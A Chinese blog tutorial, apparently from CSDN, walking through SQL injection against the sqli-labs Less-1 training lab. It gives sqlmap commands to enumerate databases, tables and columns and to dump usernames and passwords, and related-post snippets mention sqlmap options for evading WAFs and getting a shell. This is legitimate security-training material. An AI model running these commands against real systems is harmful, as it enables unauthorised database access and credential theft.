网络安全-sqlmap实战之sqlilabs-Less1

最新推荐文章于 2024-05-03 23:12:13 发布
最新推荐文章于 2024-05-03 23:12:13 发布
阅读量1.5k 收藏 9
点赞数 1
分类专栏: 网络安全 文章标签: sqlilabs sql注入 sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lady_killer9/article/details/106917954
版权

目录

类型

注入判断

-u参数

 -dbs参数爆数据库

 -tables参数爆表

-columns爆列

 -dump爆数据

查看源代码

查看数据库

类型

基于字符串的错误

注入判断

?id=1'

 

存在sql注入

根据提示猜测,sql语句大概为

select * from 表名 where id = 参数 LIMIT 0,1

-u参数

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1"
sql注入类型

 共发现4种注入类型

随便测试了一种

 -dbs参数爆数据库

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -dbs

 

数据库

 -tables参数爆表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -tables

-columns爆列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -columns

 -dump爆数据

选择把三列数据都爆出来

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -C id,username,password -dump
爆数据

查看源代码

sql语句为

SELECT * FROM users WHERE id='$id' LIMIT 0,1

查看数据库

users表

更多内容查看:网络安全-自学笔记

有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

lady_killer9
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8103
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
使用sqlmapsqli-less1注入过程
weixin_44352058的博客
05-02 708
使用sqlmap脚本工具的sqli-less1题解 1.检测当前注入点,测试表明GET参数ID可能是可注入型的 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 2. 找出所有的数据库名 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --dbs 3.查看数据库中的表 sqlmap.py -...
网络安全-sqlmap实战sqlilabs-Less3
关注网络安全、云原生安全
06-26 2016
类型 字符串转换错误,他又提示输入数字型ID,应该是把数字转换为了字符串 注入判断 截图 结合课程1,猜测sql语句为 select * from users where id = ('参数') LIMIT 0,1 -dbs枚举数据库 python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs 4种注入方式 枚举数据库 -tables枚举表 python sqlmap.py -u "192...
sqli-labs/less-1:基于错误提示的sql注入
paintShadow的博客
07-31 987
根据大佬的文章做的sql注入 打开less-1得到以上界面,页面提示:输入数字范围内的id 首先构造URL,?id=1会得到以下界面 然后依次向下试验,发现到id=13时没有出现任何信息 当输入id=1’ order by 1,‘1时,页面与输入id=1一样,但是并未出现语法错误,原因是sql语句会变成id=‘1’ order by 1,‘1’。所以依次试下去会发现order by 2和3都是能显...
Sqli-labs 基本注入篇 (Less1~22)
angry_program的博客
01-20 1331
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 基本注入篇对应labs的1~22关: 目录 Sqli-labs 基本注入篇 Less-1 单引号显错注入 一、手工注入 1. 判断字符型与整数型注入 2. 爆字段数 3. 爆库爆表爆字段 4. 取对应字段的值 二、sqlmap自动注入 1. 检测目标网站存在的注入漏洞类型 2....
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
sqlmapproject-sqlmap-1.5.7-1.zip
09-28
在压缩包"sqlmapproject-sqlmap-1f3a141"中,可能包含了源代码、文档、示例以及配置文件等资源。用户可以通过解压文件,深入了解SQLmap的工作原理,学习如何利用它进行安全测试。 总的来说,SQLmap是安全专业人员的...
sqli-labs.rar
12-22
此外,随着你逐渐熟悉sqli-labs中的挑战,你可以尝试使用自动化工具如sqlmap进行自动化注入测试,这将帮助你理解攻击者可能使用的工具和技术。 最后,别忘了实践是最好的老师。完成sqli-labs的所有挑战后,你应该对...
SQLi-LABS Page-1(Basic Challenges)
07-24
总的来说,SQLi-LABS Page-1的挑战涵盖了SQL注入的基础知识,包括错误回显注入、无回显的布尔盲注,以及如何使用自动化工具如SQLmap。这些练习有助于提高安全专家和Web开发者识别和防御SQL注入攻击的能力,从而保护...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
2024年网络安全最新网络安全-sqlmap实战sqlilabs-Less1_less1爆表
最新发布
2401_84302796的博客
05-03 891
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 971
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
Less-1(sqlmap自动注入攻击)--sqli
XiaoYeZhu_1314的博客
01-28 636
表明有四种注入漏洞:boolean-based blind,error-based,time-based blind,UNION query。指定用于身份验证的cookie进行注入测试。打开火狐浏览器,进入sqli第一关的页面。尝试获取操作系统级别的shell访问权限。指定POST请求的数据进行注入测试。查看结果发现,可以访问到名字和密码。遇见[y/n]都直接回车跳过,得到。设置测试的深度级别(1-5)设置测试的风险级别(1-3)获取数据库管理系统的信息。获取数据库中表的信息。获取数据库表中的数据。
SQL注入sqlmap爆破sqli-labs-master
龙乐的专栏
08-23 9879
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。 GET型的sqlmap爆破。 1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库中数据表:python sqlmap.py -u http://loc
网络安全-sqlmap实战sqlilabs-Less11
关注网络安全、云原生安全
07-10 2193
目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 基于错误-字符串 登陆成功 当然,因为之前已经通过sql注入看到了数据库,正常情况下应该是失败,而且网站一般有验证码。 登录失败 错误回显 sql语句猜测 select * from users where username="参数" and password="参数" LIMIT 0,1 -dbs枚举数据库 使用-o参数优化,--batch
渗透测试之sqlilab基础(三)sqlmap的使用
LKmnbZ's Blog
11-07 1005
1. sqlmap sqlmap启动连接到目标后 直接先测试目标连接性 之后紧接着测试waf 并进行识别 如果有相应的waf规则 会进行提示 2. sqlmap get的使用过程 #获取数据库名称 sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' --dbs --flush-session #获取s...
sqlmap--分析---less-1
weixin_43803070的博客
03-09 1111
wireshark、sqlmap 为了避免被 waf 或者日志里面记录,我们一般可以添加一个 --random-agent。在我们的服务器日志也可以看到大量的请求。很容易识别出是sqlmap在扫描。 使用-technique参数来指定我们的注入分类。一般sqlmap有以下几种注入: --technique=TECH.. SQL injection techniques to use (def...
sqli-labs/Less-2/?id=1 分析查询账号密码的具体过程和步骤。
weixin_46164380的博客
02-24 398
判断是否存在sql注入 and前面多了一个‘号,可以换成数字注入试一试 爆数据库的字段 查询当前用户和数据库 查询当前数据库的所有表 查询users表的所有字段 查询id,username,password字段的类容 ...
SQL注入sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 4736
SQL注入sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
搭建本地SQL注入靶场:sqli-labs实战教程
sqli-labs提供多样且最新的SQL漏洞环境,同时允许用户修改和审计源码,是网络安全初学者的理想实践平台。为了安全起见,推荐在本地环境而非公网服务器上进行安装。" 安装sqli-labs的详细步骤如下: 1. **了解本地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lady_killer9

感谢您的打赏,我会加倍努力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值